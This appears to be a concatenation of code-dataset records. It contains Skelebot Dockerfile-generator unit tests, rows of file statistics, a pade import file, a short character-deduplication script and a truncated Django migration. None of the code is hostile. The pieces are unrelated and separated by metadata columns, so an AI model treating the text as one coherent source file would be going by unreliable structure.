    expectedDockerfile = """
# This Dockerfile was generated by Skelebot
# Editing this file manually is not advised as all changes will be overwritten by Skelebot
FROM skelebot/r-base
MAINTAINER Mega Man <megaman@cars.com>
WORKDIR /app
RUN ["Rscript", "-e", "install.packages('pyyaml', repo='https://cloud.r-project.org'); library(pyyaml)"]
RUN ["Rscript", "-e", "install.packages('artifactory', repo='https://cloud.r-project.org'); library(artifactory)"]
RUN ["Rscript", "-e", "install.packages('argparse', repo='https://cloud.r-project.org'); library(argparse)"]
RUN ["Rscript", "-e", "install.packages('coverage', repo='https://cloud.r-project.org'); library(coverage)"]
RUN ["Rscript", "-e", "install.packages('pytest', repo='https://cloud.r-project.org'); library(pytest)"]
RUN ["Rscript", "-e", "library(devtools); install_github('github.com/repo'); library(cool-lib)"]
COPY libs/proj libs/proj
RUN ["Rscript", "-e", "install.packages('/app/libs/proj', repos=NULL, type='source'); library(cool-proj)"]
RUN ["Rscript", "-e", "library(devtools); install_version('dtable', version='9.0', repos='http://cran.us.r-project.org'); library(dtable)"]
COPY . /app
RUN rm -rf build/
RUN rm -rf dist/
CMD /bin/bash -c \"bash build.sh --env local --log info\"\n"""

    sb.systems.generators.dockerfile.buildDockerfile(config)

    data = None
    with open(filePath, "r") as file:
        data = file.read()

    # assertIsNotNone gives a clearer failure message than assertTrue(x is not None)
    self.assertIsNotNone(data)
    self.assertEqual(data, expectedDockerfile)
@mock.patch('os.path.expanduser')
@mock.patch('os.getcwd')
def test_buildDockerfile_entrypoint_exec(self, mock_getcwd, mock_expanduser):
    """When primaryExe is ENTRYPOINT, the Dockerfile ends with an exec-form
    ENTRYPOINT instead of a shell-form CMD."""
    folderPath = "{path}/test/files".format(path=self.path)
    filePath = "{folder}/Dockerfile".format(folder=folderPath)
    # Point the plugin dir and cwd at test fixtures before loading config.
    mock_expanduser.return_value = "{path}/test/plugins".format(path=self.path)
    mock_getcwd.return_value = folderPath
    config = sb.systems.generators.yaml.loadConfig()
    config.primaryExe = "ENTRYPOINT"
    expectedDockerfile = """
# This Dockerfile was generated by Skelebot
# Editing this file manually is not advised as all changes will be overwritten by Skelebot
FROM skelebot/python-base:3.6
MAINTAINER Mega Man <megaman@cars.com>
WORKDIR /app
RUN ["pip", "install", "pyyaml"]
RUN ["pip", "install", "artifactory"]
RUN ["pip", "install", "argparse"]
RUN ["pip", "install", "coverage"]
RUN ["pip", "install", "pytest"]
COPY . /app
RUN rm -rf build/
RUN rm -rf dist/
ENTRYPOINT [\"bash\", \"build.sh\"]\n"""

    sb.systems.generators.dockerfile.buildDockerfile(config)

    data = None
    with open(filePath, "r") as file:
        data = file.read()

    # assertIsNotNone gives a clearer failure message than assertTrue(x is not None)
    self.assertIsNotNone(data)
    self.assertEqual(data, expectedDockerfile)
@mock.patch('os.path.expanduser')
@mock.patch('os.getcwd')
def test_buildDockerfile_entrypoint_path(self, mock_getcwd, mock_expanduser):
    """primaryExe=ENTRYPOINT with a primaryJob emits an ENTRYPOINT running that job's source."""
    folderPath = "{path}/test/files".format(path=self.path)
    filePath = "{folder}/Dockerfile".format(folder=folderPath)
    mock_expanduser.return_value = "{path}/test/plugins".format(path=self.path)
    mock_getcwd.return_value = folderPath
    config = sb.systems.generators.yaml.loadConfig()
    config.primaryExe = "ENTRYPOINT"
    config.primaryJob = "test-entrypoint-path"
    job = sb.objects.job.Job(name="test-entrypoint-path", source="jobs/dummy.py")
    config.jobs.append(job)
    expectedDockerfile = """
# This Dockerfile was generated by Skelebot
# Editing this file manually is not advised as all changes will be overwritten by Skelebot
FROM skelebot/python-base:3.6
MAINTAINER Mega Man <megaman@cars.com>
WORKDIR /app
RUN ["pip", "install", "pyyaml"]
RUN ["pip", "install", "artifactory"]
RUN ["pip", "install", "argparse"]
RUN ["pip", "install", "coverage"]
RUN ["pip", "install", "pytest"]
COPY . /app
RUN rm -rf build/
RUN rm -rf dist/
ENTRYPOINT ["python", "-u", "jobs/dummy.py"]\n"""
    sb.systems.generators.dockerfile.buildDockerfile(config)
    # 'dockerfile' avoids shadowing the builtin 'file'; assertIsNotNone gives a
    # clearer failure message than assertTrue(data is not None)
    with open(filePath, "r") as dockerfile:
        data = dockerfile.read()
    self.assertIsNotNone(data)
    self.assertEqual(data, expectedDockerfile)
@mock.patch('os.path.expanduser')
@mock.patch('os.getcwd')
def test_buildDockerfile_cmd_path(self, mock_getcwd, mock_expanduser):
    """primaryExe=CMD with a primaryJob emits a shell-form CMD running that job's source."""
    folderPath = "{path}/test/files".format(path=self.path)
    filePath = "{folder}/Dockerfile".format(folder=folderPath)
    mock_expanduser.return_value = "{path}/test/plugins".format(path=self.path)
    mock_getcwd.return_value = folderPath
    config = sb.systems.generators.yaml.loadConfig()
    config.primaryExe = "CMD"
    config.primaryJob = "test-cmd-path"
    job = sb.objects.job.Job(name="test-cmd-path", source="jobs/dummy.py")
    config.jobs.append(job)
    expectedDockerfile = """
# This Dockerfile was generated by Skelebot
# Editing this file manually is not advised as all changes will be overwritten by Skelebot
FROM skelebot/python-base:3.6
MAINTAINER Mega Man <megaman@cars.com>
WORKDIR /app
RUN ["pip", "install", "pyyaml"]
RUN ["pip", "install", "artifactory"]
RUN ["pip", "install", "argparse"]
RUN ["pip", "install", "coverage"]
RUN ["pip", "install", "pytest"]
COPY . /app
RUN rm -rf build/
RUN rm -rf dist/
CMD /bin/bash -c "python -u jobs/dummy.py --log info"\n"""
    sb.systems.generators.dockerfile.buildDockerfile(config)
    # 'dockerfile' avoids shadowing the builtin 'file'; assertIsNotNone gives a
    # clearer failure message than assertTrue(data is not None)
    with open(filePath, "r") as dockerfile:
        data = dockerfile.read()
    self.assertIsNotNone(data)
    self.assertEqual(data, expectedDockerfile)
@mock.patch('os.path.expanduser')
@mock.patch('os.getcwd')
def test_buildDockerfile_base_py(self, mock_getcwd, mock_expanduser):
    """Generate a Dockerfile for a Python project with github, file, and pinned-version deps."""
    folderPath = "{path}/test/files".format(path=self.path)
    filePath = "{folder}/Dockerfile".format(folder=folderPath)
    mock_expanduser.return_value = "{path}/test/plugins".format(path=self.path)
    mock_getcwd.return_value = folderPath
    config = sb.systems.generators.yaml.loadConfig()
    config.language = "Python"
    config.dependencies.append("github:github.com/repo")
    config.dependencies.append("github:https://github.com/securerepo")
    config.dependencies.append("file:libs/proj")
    config.dependencies.append("dtable=9.0")
    expectedDockerfile = """
# This Dockerfile was generated by Skelebot
# Editing this file manually is not advised as all changes will be overwritten by Skelebot
FROM skelebot/python-base:3.6
MAINTAINER Mega Man <megaman@cars.com>
WORKDIR /app
RUN ["pip", "install", "pyyaml"]
RUN ["pip", "install", "artifactory"]
RUN ["pip", "install", "argparse"]
RUN ["pip", "install", "coverage"]
RUN ["pip", "install", "pytest"]
RUN ["pip", "install", "git+github.com/repo"]
RUN ["pip", "install", "git+https://github.com/securerepo"]
COPY libs/proj libs/proj
RUN ["pip", "install", "/app/libs/proj"]
RUN ["pip", "install", "dtable==9.0"]
COPY . /app
RUN rm -rf build/
RUN rm -rf dist/
CMD /bin/bash -c \"bash build.sh --env local --log info\"\n"""
    sb.systems.generators.dockerfile.buildDockerfile(config)
    # 'dockerfile' avoids shadowing the builtin 'file'; assertIsNotNone gives a
    # clearer failure message than assertTrue(data is not None)
    with open(filePath, "r") as dockerfile:
        data = dockerfile.read()
    self.assertIsNotNone(data)
    self.assertEqual(data, expectedDockerfile)
@mock.patch('os.path.expanduser')
@mock.patch('os.getcwd')
def test_buildDockerfile_base_py_versions(self, mock_getcwd, mock_expanduser):
    """PEP 440 version specifiers (==, ~=, !=, ranges) pass through to pip unchanged;
    only the skelebot 'name=version' form is rewritten to 'name==version'."""
    folderPath = "{path}/test/files".format(path=self.path)
    filePath = "{folder}/Dockerfile".format(folder=folderPath)
    mock_expanduser.return_value = "{path}/test/plugins".format(path=self.path)
    mock_getcwd.return_value = folderPath
    config = sb.systems.generators.yaml.loadConfig()
    config.language = "Python"
    config.dependencies.append("dtable=9.0")
    config.dependencies.append("pandas==0.25")
    config.dependencies.append("numpy~=1.17")
    config.dependencies.append("requests>= 2.2, == 2.*")
    config.dependencies.append("scipy!= 1.3.*")
    expectedDockerfile = """
# This Dockerfile was generated by Skelebot
# Editing this file manually is not advised as all changes will be overwritten by Skelebot
FROM skelebot/python-base:3.6
MAINTAINER Mega Man <megaman@cars.com>
WORKDIR /app
RUN ["pip", "install", "pyyaml"]
RUN ["pip", "install", "artifactory"]
RUN ["pip", "install", "argparse"]
RUN ["pip", "install", "coverage"]
RUN ["pip", "install", "pytest"]
RUN ["pip", "install", "dtable==9.0"]
RUN ["pip", "install", "pandas==0.25"]
RUN ["pip", "install", "numpy~=1.17"]
RUN ["pip", "install", "requests>= 2.2, == 2.*"]
RUN ["pip", "install", "scipy!= 1.3.*"]
COPY . /app
RUN rm -rf build/
RUN rm -rf dist/
CMD /bin/bash -c \"bash build.sh --env local --log info\"\n"""
    sb.systems.generators.dockerfile.buildDockerfile(config)
    # 'dockerfile' avoids shadowing the builtin 'file'; assertIsNotNone gives a
    # clearer failure message than assertTrue(data is not None)
    with open(filePath, "r") as dockerfile:
        data = dockerfile.read()
    self.assertIsNotNone(data)
    self.assertEqual(data, expectedDockerfile)
@mock.patch('os.path.expanduser')
@mock.patch('os.getcwd')
def test_buildDockerfile_krb(self, mock_getcwd, mock_expanduser):
    """A Kerberos component switches the base image to r-krb, copies the conf/keytab,
    and prefixes the CMD with the krb init script."""
    folderPath = "{path}/test/files".format(path=self.path)
    filePath = "{folder}/Dockerfile".format(folder=folderPath)
    mock_expanduser.return_value = "{path}/test/plugins".format(path=self.path)
    mock_getcwd.return_value = folderPath
    config = sb.systems.generators.yaml.loadConfig()
    config.language = "R"
    config.dependencies.append("github:github.com/repo:cool-lib")
    config.dependencies.append("file:libs/proj:cool-proj")
    config.dependencies.append("dtable=9.0")
    config.components.append(sb.components.kerberos.Kerberos("conf", "tab", "user"))
    expectedDockerfile = """
# This Dockerfile was generated by Skelebot
# Editing this file manually is not advised as all changes will be overwritten by Skelebot
FROM skelebot/r-krb
MAINTAINER Mega Man <megaman@cars.com>
WORKDIR /app
RUN ["Rscript", "-e", "install.packages('pyyaml', repo='https://cloud.r-project.org'); library(pyyaml)"]
RUN ["Rscript", "-e", "install.packages('artifactory', repo='https://cloud.r-project.org'); library(artifactory)"]
RUN ["Rscript", "-e", "install.packages('argparse', repo='https://cloud.r-project.org'); library(argparse)"]
RUN ["Rscript", "-e", "install.packages('coverage', repo='https://cloud.r-project.org'); library(coverage)"]
RUN ["Rscript", "-e", "install.packages('pytest', repo='https://cloud.r-project.org'); library(pytest)"]
RUN ["Rscript", "-e", "library(devtools); install_github('github.com/repo'); library(cool-lib)"]
COPY libs/proj libs/proj
RUN ["Rscript", "-e", "install.packages('/app/libs/proj', repos=NULL, type='source'); library(cool-proj)"]
RUN ["Rscript", "-e", "library(devtools); install_version('dtable', version='9.0', repos='http://cran.us.r-project.org'); library(dtable)"]
COPY . /app
RUN rm -rf build/
RUN rm -rf dist/
COPY conf /etc/krb5.conf
COPY tab /krb/auth.keytab
CMD /bin/bash -c \"/./krb/init.sh user && bash build.sh --env local --log info\"\n"""
    sb.systems.generators.dockerfile.buildDockerfile(config)
    # 'dockerfile' avoids shadowing the builtin 'file'; assertIsNotNone gives a
    # clearer failure message than assertTrue(data is not None)
    with open(filePath, "r") as dockerfile:
        data = dockerfile.read()
    self.assertIsNotNone(data)
    self.assertEqual(data, expectedDockerfile)
@mock.patch('os.path.expanduser')
@mock.patch('os.getcwd')
def test_buildDockerfile_no_command(self, mock_getcwd, mock_expanduser):
    """With no language and no custom commands the generator falls back to plain ubuntu
    and emits no RUN/dependency layers."""
    folderPath = "{path}/test/files".format(path=self.path)
    filePath = "{folder}/Dockerfile".format(folder=folderPath)
    mock_expanduser.return_value = "{path}/test/plugins".format(path=self.path)
    mock_getcwd.return_value = folderPath
    config = sb.systems.generators.yaml.loadConfig()
    # No custom docker run command
    config.commands = []
    config.language = None
    expectedDockerfile = """
# This Dockerfile was generated by Skelebot
# Editing this file manually is not advised as all changes will be overwritten by Skelebot
FROM ubuntu:18.04
MAINTAINER Mega Man <megaman@cars.com>
WORKDIR /app
COPY . /app
CMD /bin/bash -c \"bash build.sh --env local --log info\"\n"""
    sb.systems.generators.dockerfile.buildDockerfile(config)
    # 'dockerfile' avoids shadowing the builtin 'file'; assertIsNotNone gives a
    # clearer failure message than assertTrue(data is not None)
    with open(filePath, "r") as dockerfile:
        data = dockerfile.read()
    self.assertIsNotNone(data)
    self.assertEqual(data, expectedDockerfile)
@mock.patch('os.path.expanduser')
@mock.patch('os.getcwd')
def test_buildDockerfile_append_command(self, mock_getcwd, mock_expanduser):
    """A component's appendCommand hook is chained onto the CMD with '&&'."""
    folderPath = "{path}/test/files".format(path=self.path)
    filePath = "{folder}/Dockerfile".format(folder=folderPath)
    mock_expanduser.return_value = "{path}/test/plugins".format(path=self.path)
    mock_getcwd.return_value = folderPath
    config = sb.systems.generators.yaml.loadConfig()
    config.language = None
    config.components.append(SayDude())
    expectedDockerfile = """
# This Dockerfile was generated by Skelebot
# Editing this file manually is not advised as all changes will be overwritten by Skelebot
FROM ubuntu:18.04
MAINTAINER Mega Man <megaman@cars.com>
WORKDIR /app
COPY . /app
RUN rm -rf build/
RUN rm -rf dist/
CMD /bin/bash -c \"bash build.sh --env local --log info && echo Duuuuuude\"\n"""
    sb.systems.generators.dockerfile.buildDockerfile(config)
    # 'dockerfile' avoids shadowing the builtin 'file'; assertIsNotNone gives a
    # clearer failure message than assertTrue(data is not None)
    with open(filePath, "r") as dockerfile:
        data = dockerfile.read()
    self.assertIsNotNone(data)
    self.assertEqual(data, expectedDockerfile)
@mock.patch('os.path.expanduser')
@mock.patch('os.getcwd')
def test_buildDockerfile_custom(self, mock_getcwd, mock_expanduser):
    """A user-supplied baseImage overrides the language-derived FROM image."""
    folderPath = "{path}/test/files".format(path=self.path)
    filePath = "{folder}/Dockerfile".format(folder=folderPath)
    mock_expanduser.return_value = "{path}/test/plugins".format(path=self.path)
    mock_getcwd.return_value = folderPath
    config = sb.systems.generators.yaml.loadConfig()
    config.baseImage = "whatever:uwant"
    expectedDockerfile = """
# This Dockerfile was generated by Skelebot
# Editing this file manually is not advised as all changes will be overwritten by Skelebot
FROM whatever:uwant
MAINTAINER Mega Man <megaman@cars.com>
WORKDIR /app
RUN ["pip", "install", "pyyaml"]
RUN ["pip", "install", "artifactory"]
RUN ["pip", "install", "argparse"]
RUN ["pip", "install", "coverage"]
RUN ["pip", "install", "pytest"]
COPY . /app
RUN rm -rf build/
RUN rm -rf dist/
CMD /bin/bash -c \"bash build.sh --env local --log info\"\n"""
    sb.systems.generators.dockerfile.buildDockerfile(config)
    # 'dockerfile' avoids shadowing the builtin 'file'; assertIsNotNone gives a
    # clearer failure message than assertTrue(data is not None)
    with open(filePath, "r") as dockerfile:
        data = dockerfile.read()
    self.assertIsNotNone(data)
    self.assertEqual(data, expectedDockerfile)
@mock.patch('os.path.expanduser')
@mock.patch('os.getcwd')
def test_buildDockerfile_R_plus_Python(self, mock_getcwd, mock_expanduser):
    """R+Python projects take per-language dependency dicts: Python deps install via
    pip3, R deps via Rscript, with Kerberos layers appended after the copy step."""
    folderPath = "{path}/test/files".format(path=self.path)
    filePath = "{folder}/Dockerfile".format(folder=folderPath)
    mock_expanduser.return_value = "{path}/test/plugins".format(path=self.path)
    mock_getcwd.return_value = folderPath
    config = sb.systems.generators.yaml.loadConfig()
    config.language = "R+Python"
    config.dependencies = {
        "Python": [
            "numpy", "pandas",
            "github:github.com/repo", "github:https://github.com/securerepo",
            "file:libs/proj",
            "dtable>=9.0", "dtable=9.0"
        ],
        "R": [
            "data.table", "here",
            "github:github.com/repo:cool-lib",
            "file:libs/proj:cool-proj",
            "dtable=9.0"
        ]
    }
    config.components.append(sb.components.kerberos.Kerberos("conf", "tab", "user"))
    expectedDockerfile = """
# This Dockerfile was generated by Skelebot
# Editing this file manually is not advised as all changes will be overwritten by Skelebot
FROM skelebot/r-krb
MAINTAINER Mega Man <megaman@cars.com>
WORKDIR /app
RUN ["pip3", "install", "numpy"]
RUN ["pip3", "install", "pandas"]
RUN ["pip3", "install", "git+github.com/repo"]
RUN ["pip3", "install", "git+https://github.com/securerepo"]
COPY libs/proj libs/proj
RUN ["pip3", "install", "/app/libs/proj"]
RUN ["pip3", "install", "dtable>=9.0"]
RUN ["pip3", "install", "dtable==9.0"]
RUN ["Rscript", "-e", "install.packages('data.table', repo='https://cloud.r-project.org'); library(data.table)"]
RUN ["Rscript", "-e", "install.packages('here', repo='https://cloud.r-project.org'); library(here)"]
RUN ["Rscript", "-e", "library(devtools); install_github('github.com/repo'); library(cool-lib)"]
COPY libs/proj libs/proj
RUN ["Rscript", "-e", "install.packages('/app/libs/proj', repos=NULL, type='source'); library(cool-proj)"]
RUN ["Rscript", "-e", "library(devtools); install_version('dtable', version='9.0', repos='http://cran.us.r-project.org'); library(dtable)"]
COPY . /app
RUN rm -rf build/
RUN rm -rf dist/
COPY conf /etc/krb5.conf
COPY tab /krb/auth.keytab
CMD /bin/bash -c "/./krb/init.sh user && bash build.sh --env local --log info\"\n"""
    sb.systems.generators.dockerfile.buildDockerfile(config)
    # 'dockerfile' avoids shadowing the builtin 'file'; assertIsNotNone gives a
    # clearer failure message than assertTrue(data is not None)
    with open(filePath, "r") as dockerfile:
        data = dockerfile.read()
    self.assertIsNotNone(data)
    self.assertEqual(data, expectedDockerfile)
@mock.patch('os.path.expanduser')
@mock.patch('os.getcwd')
def test_buildDockerfile_timezone(self, mock_getcwd, mock_expanduser):
    """config.timezone adds an ENV TZ layer and a zoneinfo symlink RUN before deps."""
    folderPath = "{path}/test/files".format(path=self.path)
    filePath = "{folder}/Dockerfile".format(folder=folderPath)
    mock_expanduser.return_value = "{path}/test/plugins".format(path=self.path)
    mock_getcwd.return_value = folderPath
    config = sb.systems.generators.yaml.loadConfig()
    config.language = "R"
    config.timezone = "America/Chicago"
    config.dependencies.append("github:github.com/repo:cool-lib")
    config.dependencies.append("file:libs/proj:cool-proj")
    config.dependencies.append("dtable=9.0")
    expectedDockerfile = """
# This Dockerfile was generated by Skelebot
# Editing this file manually is not advised as all changes will be overwritten by Skelebot
FROM skelebot/r-base
MAINTAINER Mega Man <megaman@cars.com>
WORKDIR /app
ENV TZ=America/Chicago
RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone
RUN ["Rscript", "-e", "install.packages('pyyaml', repo='https://cloud.r-project.org'); library(pyyaml)"]
RUN ["Rscript", "-e", "install.packages('artifactory', repo='https://cloud.r-project.org'); library(artifactory)"]
RUN ["Rscript", "-e", "install.packages('argparse', repo='https://cloud.r-project.org'); library(argparse)"]
RUN ["Rscript", "-e", "install.packages('coverage', repo='https://cloud.r-project.org'); library(coverage)"]
RUN ["Rscript", "-e", "install.packages('pytest', repo='https://cloud.r-project.org'); library(pytest)"]
RUN ["Rscript", "-e", "library(devtools); install_github('github.com/repo'); library(cool-lib)"]
COPY libs/proj libs/proj
RUN ["Rscript", "-e", "install.packages('/app/libs/proj', repos=NULL, type='source'); library(cool-proj)"]
RUN ["Rscript", "-e", "library(devtools); install_version('dtable', version='9.0', repos='http://cran.us.r-project.org'); library(dtable)"]
COPY . /app
RUN rm -rf build/
RUN rm -rf dist/
CMD /bin/bash -c \"bash build.sh --env local --log info\"\n"""
    sb.systems.generators.dockerfile.buildDockerfile(config)
    # 'dockerfile' avoids shadowing the builtin 'file'; assertIsNotNone gives a
    # clearer failure message than assertTrue(data is not None)
    with open(filePath, "r") as dockerfile:
        data = dockerfile.read()
    self.assertIsNotNone(data)
    self.assertEqual(data, expectedDockerfile)
# Allow running this test module directly (e.g. `python test_dockerfile.py`).
if __name__ == '__main__':
    unittest.main()
| 40.377698
| 139
| 0.6702
| 2,876
| 22,450
| 5.186022
| 0.07267
| 0.015689
| 0.033993
| 0.031378
| 0.921421
| 0.907275
| 0.898424
| 0.88877
| 0.884747
| 0.884747
| 0
| 0.004588
| 0.174833
| 22,450
| 555
| 140
| 40.45045
| 0.80054
| 0.007706
| 0
| 0.820513
| 0
| 0.07265
| 0.505365
| 0.062946
| 0
| 0
| 0
| 0
| 0.055556
| 1
| 0.032051
| false
| 0
| 0.008547
| 0.002137
| 0.051282
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
21bfd128d847dfb319ee42109bdd19ef2eb473aa
| 242
|
py
|
Python
|
pade/behaviours/highlevel.py
|
bressanmarcos/pade-plus
|
b879a3c543f6c291a8779879efdc8119ce8ed0d5
|
[
"MIT"
] | null | null | null |
pade/behaviours/highlevel.py
|
bressanmarcos/pade-plus
|
b879a3c543f6c291a8779879efdc8119ce8ed0d5
|
[
"MIT"
] | null | null | null |
pade/behaviours/highlevel.py
|
bressanmarcos/pade-plus
|
b879a3c543f6c291a8779879efdc8119ce8ed0d5
|
[
"MIT"
] | null | null | null |
from .session import AgentSession
from .session.exceptions import *
from .session.fipa_contractnet import FipaContractNetProtocol
from .session.fipa_request import FipaRequestProtocol
from .session.fipa_subscribe import FipaSubscribeProtocol
| 40.333333
| 61
| 0.876033
| 26
| 242
| 8.038462
| 0.461538
| 0.263158
| 0.215311
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082645
| 242
| 5
| 62
| 48.4
| 0.941441
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
21d7bd94c2df4a57e1673ec71fe769ab67d145c5
| 231
|
py
|
Python
|
_28_EXERCISE_TEXT_PROCESSING/_6_Replace_Repeating_Chars.py
|
YordanPetrovDS/Python_Fundamentals
|
81163054cd3ac780697eaa43f099cc455f253a0c
|
[
"MIT"
] | null | null | null |
_28_EXERCISE_TEXT_PROCESSING/_6_Replace_Repeating_Chars.py
|
YordanPetrovDS/Python_Fundamentals
|
81163054cd3ac780697eaa43f099cc455f253a0c
|
[
"MIT"
] | null | null | null |
_28_EXERCISE_TEXT_PROCESSING/_6_Replace_Repeating_Chars.py
|
YordanPetrovDS/Python_Fundamentals
|
81163054cd3ac780697eaa43f099cc455f253a0c
|
[
"MIT"
] | null | null | null |
# Collapse consecutive repeating characters from one line of stdin:
# a character is kept only when it differs from its immediate predecessor
# (e.g. "aabbc" -> "abc"). Output has no trailing newline.
line = input()
deduplicated = "".join(
    char for index, char in enumerate(line)
    if index == 0 or char != line[index - 1]
)
# A single print beats the original list comprehension that was run purely for
# its print side effects (it built and discarded a list of None values).
print(deduplicated, end="")
| 28.875
| 97
| 0.584416
| 36
| 231
| 3.75
| 0.361111
| 0.118519
| 0.177778
| 0.207407
| 0.755556
| 0.755556
| 0.755556
| 0.755556
| 0.755556
| 0.755556
| 0
| 0.022599
| 0.233766
| 231
| 7
| 98
| 33
| 0.740113
| 0.471861
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
df16420cd7463200c150ab8401d682a553906740
| 6,882
|
py
|
Python
|
slavdict/csl_annotations/migrations/0003_auto_20191029_1724.py
|
slavdict/slavdict
|
893886b80de413cb2bb6c0af5adba9c55aa6a7af
|
[
"CC0-1.0"
] | 1
|
2022-01-17T17:26:25.000Z
|
2022-01-17T17:26:25.000Z
|
slavdict/csl_annotations/migrations/0003_auto_20191029_1724.py
|
slavdict/slavdict
|
893886b80de413cb2bb6c0af5adba9c55aa6a7af
|
[
"CC0-1.0"
] | 8
|
2020-02-12T13:26:05.000Z
|
2022-02-10T19:28:07.000Z
|
slavdict/csl_annotations/migrations/0003_auto_20191029_1724.py
|
slavdict/slavdict
|
893886b80de413cb2bb6c0af5adba9c55aa6a7af
|
[
"CC0-1.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.25 on 2019-10-29 17:24
from django.db import migrations, models
import slavdict.csl_annotations.models
class Migration(migrations.Migration):
    """Auto-generated migration (Django 1.11.25): updates help_text/verbose_name
    on the Annotation model's anchor, annotation, bib, teaser, and title fields.

    NOTE(review): generated file — the long escaped literals below are Russian
    UI help texts; avoid editing by hand.
    """

    dependencies = [
        ('csl_annotations', '0002_auto_20191020_2313'),
    ]

    operations = [
        migrations.AlterField(
            model_name='annotation',
            name='anchor',
            field=models.SlugField(blank=True, help_text='\n\n \u042f\u043a\u043e\u0440\u044c, \u0447\u0442\u043e\u0431\u044b \u0441\u043e\u0441\u043b\u0430\u0442\u044c\u0441\u044f \u043d\u0430 \u0442\u0435\u043a\u0443\u0449\u0443\u044e \u0430\u043d\u043d\u043e\u0442\u0430\u0446\u0438\u044e \u0438\u0437 \u0434\u0440\u0443\u0433\u043e\u0439 \u0430\u043d\u043d\u043e\u0442\u0430\u0446\u0438\u0438.<br>\n \u0415\u0441\u043b\u0438 \u0441\u0441\u044b\u043b\u043a\u0430\u0442\u044c\u0441\u044f \u043d\u0430 \u0434\u0430\u043d\u043d\u0443\u044e \u0430\u043d\u043d\u043e\u0442\u0430\u0446\u0438\u044e \u0438\u0437 \u0434\u0440\u0443\u0433\u043e\u0439 \u043d\u0435\u0442 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0441\u0442\u0438,<br>\n \u0442\u043e \u043f\u043e\u043b\u0435 \u043c\u043e\u0436\u043d\u043e \u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0442\u044c \u043f\u0443\u0441\u0442\u044b\u043c.<br>\n <br>\n \u0415\u0441\u043b\u0438 \u044f\u043a\u043e\u0440\u044c \u0430\u043d\u043d\u043e\u0442\u0430\u0446\u0438\u0438 \u043d\u0430 \xab\u0440\u0435\u0441\u0443\u0440\u0441 N\xbb \u0437\u0430\u0434\u0430\u043d \u0442\u0430\u043a <span\n style="color: #070">ludogovsk8</span>, \u0442\u043e \u0441\u043e\u0441\u043b\u0430\u0442\u044c\u0441\u044f<br>\n \u0438\u0437 \u0442\u0435\u043a\u0441\u0442\u0430 \u0434\u0440\u0443\u0433\u043e\u0439 \u0430\u043d\u043d\u043e\u0442\u0430\u0446\u0438\u0438 \u043d\u0430 \u043d\u0435\u0433\u043e \u043c\u043e\u0436\u043d\u043e \u0442\u0430\u043a:\n <span style="color: #070">\u0441\u043c. [\u0440\u0435\u0441\u0443\u0440\u0441 N](#ludogovsk8)</span>.<br>\n\n', max_length=30, null=True, unique=True, verbose_name='\u044f\u043a\u043e\u0440\u044c'),
        ),
        migrations.AlterField(
            model_name='annotation',
            name='annotation',
            field=models.TextField(blank=True, help_text='\n\n \u041e\u0431\u044f\u0437\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u0434\u043b\u044f \u043a\u043d\u0438\u0433 \u0438 \u0441\u0442\u0430\u0442\u0435\u0439, \u0444\u0430\u043a\u0443\u043b\u044c\u0442\u0430\u0442\u0438\u0432\u043d\u043e \u0434\u043b\u044f \u0432\u0438\u0434\u0435\u043e.\n\n\n\n <p style="font-size: xx-small; margin-bottom: 1em">\n \u0414\u043b\u044f \u043a\u0443\u0440\u0441\u0438\u0432\u0430, \u0441\u0441\u044b\u043b\u043e\u043a \u0438 \u0430\u0431\u0437\u0430\u0446\u0435\u0432 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0439\u0442\u0435\n <a target="_blank" href="https://docs.google.com/document/d/1onDgE9wkZSGbXZg5V3GdoPx8gQ4fhXe73E7Sn0qvDY4">\u0440\u0430\u0437\u043c\u0435\u0442\u043a\u0443 Markdown</a>.</p>\n\n', null=True, unique=True, verbose_name='\u0430\u043d\u043d\u043e\u0442\u0430\u0446\u0438\u044f'),
        ),
        migrations.AlterField(
            model_name='annotation',
            name='bib',
            field=slavdict.csl_annotations.models.FixedWidthTextField(blank=True, help_text='\u0414\u043b\u044f \u043a\u043d\u0438\u0433 \u0438 \u0441\u0442\u0430\u0442\u0435\u0439.\n\n <p style="font-size: xx-small; margin-bottom: 1em">\n \u0414\u043b\u044f \u043a\u0443\u0440\u0441\u0438\u0432\u0430, \u0441\u0441\u044b\u043b\u043e\u043a \u0438 \u0430\u0431\u0437\u0430\u0446\u0435\u0432 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0439\u0442\u0435\n <a target="_blank" href="https://docs.google.com/document/d/1onDgE9wkZSGbXZg5V3GdoPx8gQ4fhXe73E7Sn0qvDY4">\u0440\u0430\u0437\u043c\u0435\u0442\u043a\u0443 Markdown</a>.</p>\n\n', max_length=2000, null=True, verbose_name='\u0431\u0438\u0431\u043b\u0438\u043e\u0433\u0440\u0430\u0444\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0441\u0441\u044b\u043b\u043a\u0430'),
        ),
        migrations.AlterField(
